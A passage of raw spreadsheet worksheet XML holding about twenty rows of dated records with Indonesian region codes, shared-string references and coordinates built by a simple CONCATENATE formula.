      <c r="V3649" s="5" t="s">
        <v>17732</v>
      </c>
      <c r="W3649" s="5">
        <v>-93844</v>
      </c>
      <c r="X3649" t="s">
        <v>21467</v>
      </c>
      <c r="Y3649" t="str">
        <f t="shared" si="56"/>
        <v xml:space="preserve"> -0.93844,114.89905</v>
      </c>
    </row>
    <row r="3650" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3650">
        <v>285407</v>
      </c>
      <c r="B3650" s="1">
        <v>44278</v>
      </c>
      <c r="C3650" s="2">
        <v>0.44635416666666666</v>
      </c>
      <c r="D3650" t="s">
        <v>22</v>
      </c>
      <c r="E3650" t="s">
        <v>23</v>
      </c>
      <c r="F3650" t="s">
        <v>12043</v>
      </c>
      <c r="G3650" t="s">
        <v>12044</v>
      </c>
      <c r="H3650" t="s">
        <v>26</v>
      </c>
      <c r="I3650" t="s">
        <v>2139</v>
      </c>
      <c r="J3650" t="s">
        <v>2627</v>
      </c>
      <c r="M3650">
        <v>3273111001</v>
      </c>
      <c r="N3650">
        <v>3273111</v>
      </c>
      <c r="O3650">
        <v>3273</v>
      </c>
      <c r="P3650">
        <v>32</v>
      </c>
      <c r="Q3650" t="s">
        <v>12045</v>
      </c>
      <c r="R3650" t="s">
        <v>6785</v>
      </c>
      <c r="S3650" t="s">
        <v>1464</v>
      </c>
      <c r="T3650" t="s">
        <v>42</v>
      </c>
      <c r="U3650" s="5">
        <v>10769623</v>
      </c>
      <c r="V3650" s="5" t="s">
        <v>17733</v>
      </c>
      <c r="W3650" s="5">
        <v>-693648</v>
      </c>
      <c r="X3650" t="s">
        <v>21468</v>
      </c>
      <c r="Y3650" t="str">
        <f t="shared" si="56"/>
        <v>-6.93648,107.69623</v>
      </c>
    </row>
    <row r="3651" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3651">
        <v>285409</v>
      </c>
      <c r="B3651" s="1">
        <v>44280</v>
      </c>
      <c r="C3651" s="2">
        <v>0.32708333333333334</v>
      </c>
      <c r="D3651" t="s">
        <v>2648</v>
      </c>
      <c r="E3651" t="s">
        <v>23</v>
      </c>
      <c r="G3651" t="s">
        <v>12046</v>
      </c>
      <c r="H3651" t="s">
        <v>26</v>
      </c>
      <c r="J3651" t="s">
        <v>5482</v>
      </c>
      <c r="L3651" t="s">
        <v>12047</v>
      </c>
      <c r="M3651">
        <v>3173080005</v>
      </c>
      <c r="N3651">
        <v>3173080</v>
      </c>
      <c r="O3651">
        <v>3173</v>
      </c>
      <c r="P3651">
        <v>31</v>
      </c>
      <c r="Q3651" t="s">
        <v>4598</v>
      </c>
      <c r="R3651" t="s">
        <v>157</v>
      </c>
      <c r="S3651" t="s">
        <v>62</v>
      </c>
      <c r="T3651" t="s">
        <v>33</v>
      </c>
      <c r="U3651" s="5">
        <v>10682044</v>
      </c>
      <c r="V3651" s="5" t="s">
        <v>17734</v>
      </c>
      <c r="W3651" s="5">
        <v>-616602</v>
      </c>
      <c r="X3651" t="s">
        <v>21469</v>
      </c>
      <c r="Y3651" t="str">
        <f t="shared" ref="Y3651:Y3714" si="57">CONCATENATE(X3651,",",V3651)</f>
        <v>-6.16602,106.82044</v>
      </c>
    </row>
    <row r="3652" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3652">
        <v>285470</v>
      </c>
      <c r="B3652" s="1">
        <v>44281</v>
      </c>
      <c r="C3652" s="2">
        <v>0.11175925925925927</v>
      </c>
      <c r="D3652" t="s">
        <v>22</v>
      </c>
      <c r="E3652" t="s">
        <v>23</v>
      </c>
      <c r="F3652" t="s">
        <v>12048</v>
      </c>
      <c r="G3652" t="s">
        <v>12049</v>
      </c>
      <c r="H3652" t="s">
        <v>26</v>
      </c>
      <c r="I3652" t="s">
        <v>430</v>
      </c>
      <c r="J3652" t="s">
        <v>2608</v>
      </c>
      <c r="L3652" t="s">
        <v>7149</v>
      </c>
      <c r="M3652">
        <v>3326161011</v>
      </c>
      <c r="N3652">
        <v>3326161</v>
      </c>
      <c r="O3652">
        <v>3326</v>
      </c>
      <c r="P3652">
        <v>33</v>
      </c>
      <c r="Q3652" t="s">
        <v>12050</v>
      </c>
      <c r="R3652" t="s">
        <v>10153</v>
      </c>
      <c r="S3652" t="s">
        <v>6246</v>
      </c>
      <c r="T3652" t="s">
        <v>1134</v>
      </c>
      <c r="U3652" s="5">
        <v>10962175</v>
      </c>
      <c r="V3652" s="5" t="s">
        <v>17735</v>
      </c>
      <c r="W3652" s="5">
        <v>-684403</v>
      </c>
      <c r="X3652" t="s">
        <v>21470</v>
      </c>
      <c r="Y3652" t="str">
        <f t="shared" si="57"/>
        <v>-6.84403,109.62175</v>
      </c>
    </row>
    <row r="3653" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3653">
        <v>285471</v>
      </c>
      <c r="B3653" s="1">
        <v>44281</v>
      </c>
      <c r="C3653" s="2">
        <v>0.47193287037037041</v>
      </c>
      <c r="D3653" t="s">
        <v>85</v>
      </c>
      <c r="E3653" t="s">
        <v>23</v>
      </c>
      <c r="F3653" t="s">
        <v>12051</v>
      </c>
      <c r="G3653" t="s">
        <v>12052</v>
      </c>
      <c r="H3653" t="s">
        <v>26</v>
      </c>
      <c r="J3653" t="s">
        <v>2627</v>
      </c>
      <c r="K3653" t="s">
        <v>12053</v>
      </c>
      <c r="L3653" t="s">
        <v>12054</v>
      </c>
      <c r="M3653">
        <v>3204270003</v>
      </c>
      <c r="N3653">
        <v>3204270</v>
      </c>
      <c r="O3653">
        <v>3204</v>
      </c>
      <c r="P3653">
        <v>32</v>
      </c>
      <c r="Q3653" t="s">
        <v>12055</v>
      </c>
      <c r="R3653" t="s">
        <v>1785</v>
      </c>
      <c r="S3653" t="s">
        <v>1464</v>
      </c>
      <c r="T3653" t="s">
        <v>42</v>
      </c>
      <c r="U3653" s="5">
        <v>10761303</v>
      </c>
      <c r="V3653" s="5" t="s">
        <v>17736</v>
      </c>
      <c r="W3653" s="5">
        <v>-697660</v>
      </c>
      <c r="X3653" t="s">
        <v>21471</v>
      </c>
      <c r="Y3653" t="str">
        <f t="shared" si="57"/>
        <v>-6.97660,107.61303</v>
      </c>
    </row>
    <row r="3654" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3654">
        <v>285472</v>
      </c>
      <c r="B3654" s="1">
        <v>44281</v>
      </c>
      <c r="C3654" s="2">
        <v>0.47501157407407407</v>
      </c>
      <c r="D3654" t="s">
        <v>85</v>
      </c>
      <c r="E3654" t="s">
        <v>23</v>
      </c>
      <c r="F3654" t="s">
        <v>12056</v>
      </c>
      <c r="G3654" t="s">
        <v>12057</v>
      </c>
      <c r="H3654" t="s">
        <v>26</v>
      </c>
      <c r="J3654" t="s">
        <v>2627</v>
      </c>
      <c r="K3654" t="s">
        <v>12058</v>
      </c>
      <c r="L3654" t="s">
        <v>12059</v>
      </c>
      <c r="M3654">
        <v>3204270003</v>
      </c>
      <c r="N3654">
        <v>3204270</v>
      </c>
      <c r="O3654">
        <v>3204</v>
      </c>
      <c r="P3654">
        <v>32</v>
      </c>
      <c r="Q3654" t="s">
        <v>12055</v>
      </c>
      <c r="R3654" t="s">
        <v>1785</v>
      </c>
      <c r="S3654" t="s">
        <v>1464</v>
      </c>
      <c r="T3654" t="s">
        <v>42</v>
      </c>
      <c r="U3654" s="5">
        <v>10761303</v>
      </c>
      <c r="V3654" s="5" t="s">
        <v>17736</v>
      </c>
      <c r="W3654" s="5">
        <v>-697660</v>
      </c>
      <c r="X3654" t="s">
        <v>21471</v>
      </c>
      <c r="Y3654" t="str">
        <f t="shared" si="57"/>
        <v>-6.97660,107.61303</v>
      </c>
    </row>
    <row r="3655" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3655">
        <v>285475</v>
      </c>
      <c r="B3655" s="1">
        <v>44283</v>
      </c>
      <c r="C3655" s="2">
        <v>0.21012731481481481</v>
      </c>
      <c r="D3655" t="s">
        <v>22</v>
      </c>
      <c r="E3655" t="s">
        <v>23</v>
      </c>
      <c r="F3655" t="s">
        <v>12060</v>
      </c>
      <c r="H3655" t="s">
        <v>26</v>
      </c>
      <c r="I3655" t="s">
        <v>1055</v>
      </c>
      <c r="J3655" t="s">
        <v>12061</v>
      </c>
      <c r="L3655" t="s">
        <v>12062</v>
      </c>
      <c r="M3655">
        <v>3174060008</v>
      </c>
      <c r="N3655">
        <v>3174060</v>
      </c>
      <c r="O3655">
        <v>3174</v>
      </c>
      <c r="P3655">
        <v>31</v>
      </c>
      <c r="Q3655" t="s">
        <v>7741</v>
      </c>
      <c r="R3655" t="s">
        <v>1762</v>
      </c>
      <c r="S3655" t="s">
        <v>32</v>
      </c>
      <c r="T3655" t="s">
        <v>33</v>
      </c>
      <c r="U3655" s="5">
        <v>10682091</v>
      </c>
      <c r="V3655" s="5" t="s">
        <v>17737</v>
      </c>
      <c r="W3655" s="5">
        <v>-614012</v>
      </c>
      <c r="X3655" t="s">
        <v>21472</v>
      </c>
      <c r="Y3655" t="str">
        <f t="shared" si="57"/>
        <v>-6.14012,106.82091</v>
      </c>
    </row>
    <row r="3656" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3656">
        <v>285479</v>
      </c>
      <c r="B3656" s="1">
        <v>44285</v>
      </c>
      <c r="C3656" s="2">
        <v>0.56194444444444447</v>
      </c>
      <c r="D3656" t="s">
        <v>22</v>
      </c>
      <c r="E3656" t="s">
        <v>23</v>
      </c>
      <c r="F3656" t="s">
        <v>12063</v>
      </c>
      <c r="G3656" t="s">
        <v>12064</v>
      </c>
      <c r="H3656" t="s">
        <v>26</v>
      </c>
      <c r="I3656" t="s">
        <v>1447</v>
      </c>
      <c r="J3656" t="s">
        <v>2622</v>
      </c>
      <c r="L3656" t="s">
        <v>12065</v>
      </c>
      <c r="M3656">
        <v>3571010005</v>
      </c>
      <c r="N3656">
        <v>3571010</v>
      </c>
      <c r="O3656">
        <v>3571</v>
      </c>
      <c r="P3656">
        <v>35</v>
      </c>
      <c r="Q3656" t="s">
        <v>9652</v>
      </c>
      <c r="R3656" t="s">
        <v>8660</v>
      </c>
      <c r="S3656" t="s">
        <v>8365</v>
      </c>
      <c r="T3656" t="s">
        <v>1221</v>
      </c>
      <c r="U3656" s="5">
        <v>11200389</v>
      </c>
      <c r="V3656" s="5" t="s">
        <v>17738</v>
      </c>
      <c r="W3656" s="5">
        <v>-782518</v>
      </c>
      <c r="X3656" t="s">
        <v>21473</v>
      </c>
      <c r="Y3656" t="str">
        <f t="shared" si="57"/>
        <v>-7.82518,112.00389</v>
      </c>
    </row>
    <row r="3657" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3657">
        <v>285480</v>
      </c>
      <c r="B3657" s="1">
        <v>44285</v>
      </c>
      <c r="C3657" s="2">
        <v>0.56812499999999999</v>
      </c>
      <c r="D3657" t="s">
        <v>22</v>
      </c>
      <c r="E3657" t="s">
        <v>23</v>
      </c>
      <c r="F3657" t="s">
        <v>12066</v>
      </c>
      <c r="G3657" t="s">
        <v>12067</v>
      </c>
      <c r="H3657" t="s">
        <v>26</v>
      </c>
      <c r="I3657" t="s">
        <v>1009</v>
      </c>
      <c r="J3657" t="s">
        <v>2622</v>
      </c>
      <c r="L3657" t="s">
        <v>12068</v>
      </c>
      <c r="M3657">
        <v>3571020007</v>
      </c>
      <c r="N3657">
        <v>3571020</v>
      </c>
      <c r="O3657">
        <v>3571</v>
      </c>
      <c r="P3657">
        <v>35</v>
      </c>
      <c r="Q3657" t="s">
        <v>9272</v>
      </c>
      <c r="R3657" t="s">
        <v>8364</v>
      </c>
      <c r="S3657" t="s">
        <v>8365</v>
      </c>
      <c r="T3657" t="s">
        <v>1221</v>
      </c>
      <c r="U3657" s="5">
        <v>11200974</v>
      </c>
      <c r="V3657" s="5" t="s">
        <v>17739</v>
      </c>
      <c r="W3657" s="5">
        <v>-782281</v>
      </c>
      <c r="X3657" t="s">
        <v>21474</v>
      </c>
      <c r="Y3657" t="str">
        <f t="shared" si="57"/>
        <v>-7.82281,112.00974</v>
      </c>
    </row>
    <row r="3658" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3658">
        <v>285493</v>
      </c>
      <c r="B3658" s="1">
        <v>44287</v>
      </c>
      <c r="C3658" s="2">
        <v>0.14196759259259259</v>
      </c>
      <c r="D3658" t="s">
        <v>22</v>
      </c>
      <c r="E3658" t="s">
        <v>23</v>
      </c>
      <c r="F3658" t="s">
        <v>12069</v>
      </c>
      <c r="G3658" t="s">
        <v>12070</v>
      </c>
      <c r="H3658" t="s">
        <v>7086</v>
      </c>
      <c r="I3658" t="s">
        <v>7499</v>
      </c>
      <c r="J3658" t="s">
        <v>7444</v>
      </c>
      <c r="L3658" t="s">
        <v>12071</v>
      </c>
      <c r="M3658">
        <v>1708070015</v>
      </c>
      <c r="N3658">
        <v>1708070</v>
      </c>
      <c r="O3658">
        <v>1708</v>
      </c>
      <c r="P3658">
        <v>17</v>
      </c>
      <c r="Q3658" t="s">
        <v>12072</v>
      </c>
      <c r="R3658" t="s">
        <v>12073</v>
      </c>
      <c r="S3658" t="s">
        <v>12074</v>
      </c>
      <c r="T3658" t="s">
        <v>7447</v>
      </c>
      <c r="U3658" s="5">
        <v>10253559</v>
      </c>
      <c r="V3658" s="5" t="s">
        <v>17740</v>
      </c>
      <c r="W3658" s="5">
        <v>-351693</v>
      </c>
      <c r="X3658" t="s">
        <v>21475</v>
      </c>
      <c r="Y3658" t="str">
        <f t="shared" si="57"/>
        <v>-3.51693,102.53559</v>
      </c>
    </row>
    <row r="3659" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3659">
        <v>285494</v>
      </c>
      <c r="B3659" s="1">
        <v>44287</v>
      </c>
      <c r="C3659" s="2">
        <v>0.2162152777777778</v>
      </c>
      <c r="D3659" t="s">
        <v>22</v>
      </c>
      <c r="E3659" t="s">
        <v>23</v>
      </c>
      <c r="F3659" t="s">
        <v>12075</v>
      </c>
      <c r="G3659" t="s">
        <v>12076</v>
      </c>
      <c r="H3659" t="s">
        <v>26</v>
      </c>
      <c r="I3659" t="s">
        <v>1447</v>
      </c>
      <c r="J3659" t="s">
        <v>2622</v>
      </c>
      <c r="L3659" t="s">
        <v>12077</v>
      </c>
      <c r="M3659">
        <v>3571020007</v>
      </c>
      <c r="N3659">
        <v>3571020</v>
      </c>
      <c r="O3659">
        <v>3571</v>
      </c>
      <c r="P3659">
        <v>35</v>
      </c>
      <c r="Q3659" t="s">
        <v>9272</v>
      </c>
      <c r="R3659" t="s">
        <v>8364</v>
      </c>
      <c r="S3659" t="s">
        <v>8365</v>
      </c>
      <c r="T3659" t="s">
        <v>1221</v>
      </c>
      <c r="U3659" s="5">
        <v>11201170</v>
      </c>
      <c r="V3659" s="5" t="s">
        <v>17741</v>
      </c>
      <c r="W3659" s="5">
        <v>-782132</v>
      </c>
      <c r="X3659" t="s">
        <v>21476</v>
      </c>
      <c r="Y3659" t="str">
        <f t="shared" si="57"/>
        <v>-7.82132,112.01170</v>
      </c>
    </row>
    <row r="3660" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3660">
        <v>285495</v>
      </c>
      <c r="B3660" s="1">
        <v>44287</v>
      </c>
      <c r="C3660" s="2">
        <v>0.21966435185185185</v>
      </c>
      <c r="D3660" t="s">
        <v>22</v>
      </c>
      <c r="E3660" t="s">
        <v>23</v>
      </c>
      <c r="F3660" t="s">
        <v>12078</v>
      </c>
      <c r="G3660" t="s">
        <v>12079</v>
      </c>
      <c r="H3660" t="s">
        <v>26</v>
      </c>
      <c r="I3660" t="s">
        <v>592</v>
      </c>
      <c r="J3660" t="s">
        <v>2622</v>
      </c>
      <c r="M3660">
        <v>3571020007</v>
      </c>
      <c r="N3660">
        <v>3571020</v>
      </c>
      <c r="O3660">
        <v>3571</v>
      </c>
      <c r="P3660">
        <v>35</v>
      </c>
      <c r="Q3660" t="s">
        <v>9272</v>
      </c>
      <c r="R3660" t="s">
        <v>8364</v>
      </c>
      <c r="S3660" t="s">
        <v>8365</v>
      </c>
      <c r="T3660" t="s">
        <v>1221</v>
      </c>
      <c r="U3660" s="5">
        <v>11201180</v>
      </c>
      <c r="V3660" s="5" t="s">
        <v>17742</v>
      </c>
      <c r="W3660" s="5">
        <v>-782122</v>
      </c>
      <c r="X3660" t="s">
        <v>21477</v>
      </c>
      <c r="Y3660" t="str">
        <f t="shared" si="57"/>
        <v>-7.82122,112.01180</v>
      </c>
    </row>
    <row r="3661" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3661">
        <v>285497</v>
      </c>
      <c r="B3661" s="1">
        <v>44288</v>
      </c>
      <c r="C3661" s="2">
        <v>0.32045138888888891</v>
      </c>
      <c r="D3661" t="s">
        <v>22</v>
      </c>
      <c r="E3661" t="s">
        <v>23</v>
      </c>
      <c r="F3661" t="s">
        <v>12080</v>
      </c>
      <c r="G3661" t="s">
        <v>12081</v>
      </c>
      <c r="H3661" t="s">
        <v>26</v>
      </c>
      <c r="I3661" t="s">
        <v>974</v>
      </c>
      <c r="J3661" t="s">
        <v>6707</v>
      </c>
      <c r="L3661" t="s">
        <v>12082</v>
      </c>
      <c r="M3661">
        <v>5272010004</v>
      </c>
      <c r="N3661">
        <v>5272010</v>
      </c>
      <c r="O3661">
        <v>5272</v>
      </c>
      <c r="P3661">
        <v>52</v>
      </c>
      <c r="Q3661" t="s">
        <v>12083</v>
      </c>
      <c r="R3661" t="s">
        <v>12084</v>
      </c>
      <c r="S3661" t="s">
        <v>12085</v>
      </c>
      <c r="T3661" t="s">
        <v>2154</v>
      </c>
      <c r="U3661" s="5">
        <v>11872959</v>
      </c>
      <c r="V3661" s="5" t="s">
        <v>17743</v>
      </c>
      <c r="W3661" s="5">
        <v>-845605</v>
      </c>
      <c r="X3661" t="s">
        <v>21478</v>
      </c>
      <c r="Y3661" t="str">
        <f t="shared" si="57"/>
        <v>-8.45605,118.72959</v>
      </c>
    </row>
    <row r="3662" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3662">
        <v>285499</v>
      </c>
      <c r="B3662" s="1">
        <v>44288</v>
      </c>
      <c r="C3662" s="2">
        <v>0.65789351851851852</v>
      </c>
      <c r="D3662" t="s">
        <v>22</v>
      </c>
      <c r="E3662" t="s">
        <v>23</v>
      </c>
      <c r="F3662" t="s">
        <v>12086</v>
      </c>
      <c r="G3662" t="s">
        <v>12087</v>
      </c>
      <c r="H3662" t="s">
        <v>26</v>
      </c>
      <c r="I3662" t="s">
        <v>193</v>
      </c>
      <c r="J3662" t="s">
        <v>6707</v>
      </c>
      <c r="L3662" t="s">
        <v>12088</v>
      </c>
      <c r="M3662">
        <v>5206030006</v>
      </c>
      <c r="N3662">
        <v>5206030</v>
      </c>
      <c r="O3662">
        <v>5206</v>
      </c>
      <c r="P3662">
        <v>52</v>
      </c>
      <c r="Q3662" t="s">
        <v>12089</v>
      </c>
      <c r="R3662" t="s">
        <v>12090</v>
      </c>
      <c r="S3662" t="s">
        <v>12085</v>
      </c>
      <c r="T3662" t="s">
        <v>2154</v>
      </c>
      <c r="U3662" s="5">
        <v>11869913</v>
      </c>
      <c r="V3662" s="5" t="s">
        <v>17744</v>
      </c>
      <c r="W3662" s="5">
        <v>-857548</v>
      </c>
      <c r="X3662" t="s">
        <v>21479</v>
      </c>
      <c r="Y3662" t="str">
        <f t="shared" si="57"/>
        <v>-8.57548,118.69913</v>
      </c>
    </row>
    <row r="3663" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3663">
        <v>285501</v>
      </c>
      <c r="B3663" s="1">
        <v>44288</v>
      </c>
      <c r="C3663" s="2">
        <v>0.81635416666666671</v>
      </c>
      <c r="D3663" t="s">
        <v>22</v>
      </c>
      <c r="E3663" t="s">
        <v>23</v>
      </c>
      <c r="F3663" t="s">
        <v>12091</v>
      </c>
      <c r="H3663" t="s">
        <v>26</v>
      </c>
      <c r="I3663" t="s">
        <v>3211</v>
      </c>
      <c r="J3663" t="s">
        <v>6707</v>
      </c>
      <c r="L3663" t="s">
        <v>12092</v>
      </c>
      <c r="M3663">
        <v>5206020017</v>
      </c>
      <c r="N3663">
        <v>5206020</v>
      </c>
      <c r="O3663">
        <v>5206</v>
      </c>
      <c r="P3663">
        <v>52</v>
      </c>
      <c r="Q3663" t="s">
        <v>12093</v>
      </c>
      <c r="R3663" t="s">
        <v>12094</v>
      </c>
      <c r="S3663" t="s">
        <v>12085</v>
      </c>
      <c r="T3663" t="s">
        <v>2154</v>
      </c>
      <c r="U3663" s="5">
        <v>11866668</v>
      </c>
      <c r="V3663" s="5" t="s">
        <v>17745</v>
      </c>
      <c r="W3663" s="5">
        <v>-848180</v>
      </c>
      <c r="X3663" t="s">
        <v>21480</v>
      </c>
      <c r="Y3663" t="str">
        <f t="shared" si="57"/>
        <v>-8.48180,118.66668</v>
      </c>
    </row>
    <row r="3664" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3664">
        <v>285502</v>
      </c>
      <c r="B3664" s="1">
        <v>44289</v>
      </c>
      <c r="C3664" s="2">
        <v>8.8888888888888892E-2</v>
      </c>
      <c r="D3664" t="s">
        <v>22</v>
      </c>
      <c r="E3664" t="s">
        <v>23</v>
      </c>
      <c r="F3664" t="s">
        <v>12095</v>
      </c>
      <c r="G3664" t="s">
        <v>12096</v>
      </c>
      <c r="H3664" t="s">
        <v>26</v>
      </c>
      <c r="I3664" t="s">
        <v>3211</v>
      </c>
      <c r="J3664" t="s">
        <v>6707</v>
      </c>
      <c r="L3664" t="s">
        <v>12097</v>
      </c>
      <c r="M3664">
        <v>5206030006</v>
      </c>
      <c r="N3664">
        <v>5206030</v>
      </c>
      <c r="O3664">
        <v>5206</v>
      </c>
      <c r="P3664">
        <v>52</v>
      </c>
      <c r="Q3664" t="s">
        <v>12089</v>
      </c>
      <c r="R3664" t="s">
        <v>12090</v>
      </c>
      <c r="S3664" t="s">
        <v>12085</v>
      </c>
      <c r="T3664" t="s">
        <v>2154</v>
      </c>
      <c r="U3664" s="5">
        <v>11869947</v>
      </c>
      <c r="V3664" s="5" t="s">
        <v>17746</v>
      </c>
      <c r="W3664" s="5">
        <v>-857523</v>
      </c>
      <c r="X3664" t="s">
        <v>21481</v>
      </c>
      <c r="Y3664" t="str">
        <f t="shared" si="57"/>
        <v>-8.57523,118.69947</v>
      </c>
    </row>
    <row r="3665" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3665">
        <v>285503</v>
      </c>
      <c r="B3665" s="1">
        <v>44290</v>
      </c>
      <c r="C3665" s="2">
        <v>0.16388888888888889</v>
      </c>
      <c r="D3665" t="s">
        <v>2648</v>
      </c>
      <c r="E3665" t="s">
        <v>23</v>
      </c>
      <c r="G3665" t="s">
        <v>12098</v>
      </c>
      <c r="H3665" t="s">
        <v>26</v>
      </c>
      <c r="J3665" t="s">
        <v>12011</v>
      </c>
      <c r="L3665" t="s">
        <v>12099</v>
      </c>
      <c r="M3665">
        <v>3172030001</v>
      </c>
      <c r="N3665">
        <v>3172030</v>
      </c>
      <c r="O3665">
        <v>3172</v>
      </c>
      <c r="P3665">
        <v>31</v>
      </c>
      <c r="Q3665" t="s">
        <v>2107</v>
      </c>
      <c r="R3665" t="s">
        <v>228</v>
      </c>
      <c r="S3665" t="s">
        <v>49</v>
      </c>
      <c r="T3665" t="s">
        <v>33</v>
      </c>
      <c r="U3665" s="5">
        <v>10691602</v>
      </c>
      <c r="V3665" s="5" t="s">
        <v>17747</v>
      </c>
      <c r="W3665" s="5">
        <v>-634284</v>
      </c>
      <c r="X3665" t="s">
        <v>21482</v>
      </c>
      <c r="Y3665" t="str">
        <f t="shared" si="57"/>
        <v>-6.34284,106.91602</v>
      </c>
    </row>
    <row r="3666" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3666">
        <v>285511</v>
      </c>
      <c r="B3666" s="1">
        <v>44290</v>
      </c>
      <c r="C3666" s="2">
        <v>0.19098379629629628</v>
      </c>
      <c r="D3666" t="s">
        <v>22</v>
      </c>
      <c r="E3666" t="s">
        <v>23</v>
      </c>
      <c r="F3666" t="s">
        <v>12100</v>
      </c>
      <c r="G3666" t="s">
        <v>12101</v>
      </c>
      <c r="H3666" t="s">
        <v>26</v>
      </c>
      <c r="I3666" t="s">
        <v>1240</v>
      </c>
      <c r="J3666" t="s">
        <v>12102</v>
      </c>
      <c r="L3666" t="s">
        <v>12103</v>
      </c>
      <c r="M3666">
        <v>5321070017</v>
      </c>
      <c r="N3666">
        <v>5321070</v>
      </c>
      <c r="O3666">
        <v>5321</v>
      </c>
      <c r="P3666">
        <v>53</v>
      </c>
      <c r="Q3666" t="s">
        <v>12104</v>
      </c>
      <c r="R3666" t="s">
        <v>12105</v>
      </c>
      <c r="S3666" t="s">
        <v>12106</v>
      </c>
      <c r="T3666" t="s">
        <v>12107</v>
      </c>
      <c r="U3666" s="5">
        <v>12487645</v>
      </c>
      <c r="V3666" s="5" t="s">
        <v>17748</v>
      </c>
      <c r="W3666" s="5">
        <v>-954601</v>
      </c>
      <c r="X3666" t="s">
        <v>21483</v>
      </c>
      <c r="Y3666" t="str">
        <f t="shared" si="57"/>
        <v>-9.54601,124.87645</v>
      </c>
    </row>
    <row r="3667" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3667">
        <v>285517</v>
      </c>
      <c r="B3667" s="1">
        <v>44290</v>
      </c>
      <c r="C3667" s="2">
        <v>0.30141203703703706</v>
      </c>
      <c r="D3667" t="s">
        <v>22</v>
      </c>
      <c r="E3667" t="s">
        <v>23</v>
      </c>
      <c r="F3667" t="s">
        <v>12108</v>
      </c>
      <c r="G3667" t="s">
        <v>12109</v>
      </c>
      <c r="H3667" t="s">
        <v>26</v>
      </c>
      <c r="I3667" t="s">
        <v>2073</v>
      </c>
      <c r="J3667" t="s">
        <v>12102</v>
      </c>
      <c r="L3667" t="s">
        <v>12110</v>
      </c>
      <c r="M3667">
        <v>5302071005</v>
      </c>
      <c r="N3667">
        <v>5302071</v>
      </c>
      <c r="O3667">
        <v>5302</v>
      </c>
      <c r="P3667">
        <v>53</v>
      </c>
      <c r="Q3667" t="s">
        <v>12111</v>
      </c>
      <c r="R3667" t="s">
        <v>12112</v>
      </c>
      <c r="S3667" t="s">
        <v>12113</v>
      </c>
      <c r="T3667" t="s">
        <v>12107</v>
      </c>
      <c r="U3667" s="5">
        <v>12029406</v>
      </c>
      <c r="V3667" s="5" t="s">
        <v>17749</v>
      </c>
      <c r="W3667" s="5">
        <v>-966533</v>
      </c>
      <c r="X3667" t="s">
        <v>21484</v>
      </c>
      <c r="Y3667" t="str">
        <f t="shared" si="57"/>
        <v>-9.66533,120.29406</v>
      </c>
    </row>
    <row r="3668" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3668">
        <v>285518</v>
      </c>
      <c r="B3668" s="1">
        <v>44290</v>
      </c>
      <c r="C3668" s="2">
        <v>0.32946759259259256</v>
      </c>
      <c r="D3668" t="s">
        <v>22</v>
      </c>
      <c r="E3668" t="s">
        <v>23</v>
      </c>
      <c r="F3668" t="s">
        <v>12114</v>
      </c>
      <c r="G3668" t="s">
        <v>12115</v>
      </c>
      <c r="H3668" t="s">
        <v>26</v>
      </c>
      <c r="I3668" t="s">
        <v>788</v>
      </c>
      <c r="J3668" t="s">
        <v>2615</v>
      </c>
      <c r="L3668" t="s">
        <v>12116</v>
      </c>
      <c r="M3668">
        <v>3404070001</v>
      </c>
      <c r="N3668">
        <v>3404070</v>
      </c>
      <c r="O3668">
        <v>3404</v>
      </c>
      <c r="P3668">
        <v>34</v>
      </c>
      <c r="Q3668" t="s">
        <v>7412</v>
      </c>
      <c r="R3668" t="s">
        <v>185</v>
      </c>
      <c r="S3668" t="s">
        <v>1855</v>
      </c>
      <c r="T3668" t="s">
        <v>1856</v>
      </c>
      <c r="U3668" s="5">
        <v>11040809</v>
      </c>
      <c r="V3668" s="5" t="s">
        <v>17750</v>
      </c>
      <c r="W3668" s="5">
        <v>-777131</v>
      </c>
      <c r="X3668" t="s">
        <v>21485</v>
      </c>
      <c r="Y3668" t="str">
        <f t="shared" si="57"/>
        <v>-7.77131,110.40809</v>
      </c>
    </row>
    <row r="3669" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3669">
        <v>285519</v>
      </c>
      <c r="B3669" s="1">
        <v>44290</v>
      </c>
      <c r="C3669" s="2">
        <v>0.35334490740740737</v>
      </c>
      <c r="D3669" t="s">
        <v>22</v>
      </c>
      <c r="E3669" t="s">
        <v>23</v>
      </c>
      <c r="F3669" t="s">
        <v>12117</v>
      </c>
      <c r="G3669" t="s">
        <v>12118</v>
      </c>
      <c r="H3669" t="s">
        <v>26</v>
      </c>
      <c r="I3669" t="s">
        <v>80</v>
      </c>
      <c r="J3669" t="s">
        <v>12102</v>
      </c>
      <c r="L3669" t="s">
        <v>12119</v>
      </c>
      <c r="M3669">
        <v>5371030009</v>
      </c>
      <c r="N3669">
        <v>5371030</v>
      </c>
      <c r="O3669">
        <v>5371</v>
      </c>
      <c r="P3669">
        <v>53</v>
      </c>
      <c r="Q3669" t="s">
        <v>12120</v>
      </c>
      <c r="R3669" t="s">
        <v>12120</v>
      </c>
      <c r="S3669" t="s">
        <v>12121</v>
      </c>
      <c r="T3669" t="s">
        <v>12107</v>
      </c>
      <c r="U3669" s="5">
        <v>12360178</v>
      </c>
      <c r="V3669" s="5" t="s">
        <v>17751</v>
      </c>
      <c r="W3669" s="5">
        <v>-1016322</v>
      </c>
      <c r="X3669" t="s">
        <v>21486</v>
      </c>
      <c r="Y3669" t="str">
        <f t="shared" si="57"/>
        <v>-10.16322,123.60178</v>
      </c>
    </row>
    <row r="3670" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3670">
        <v>285520</v>
      </c>
      <c r="B3670" s="1">
        <v>44290</v>
      </c>
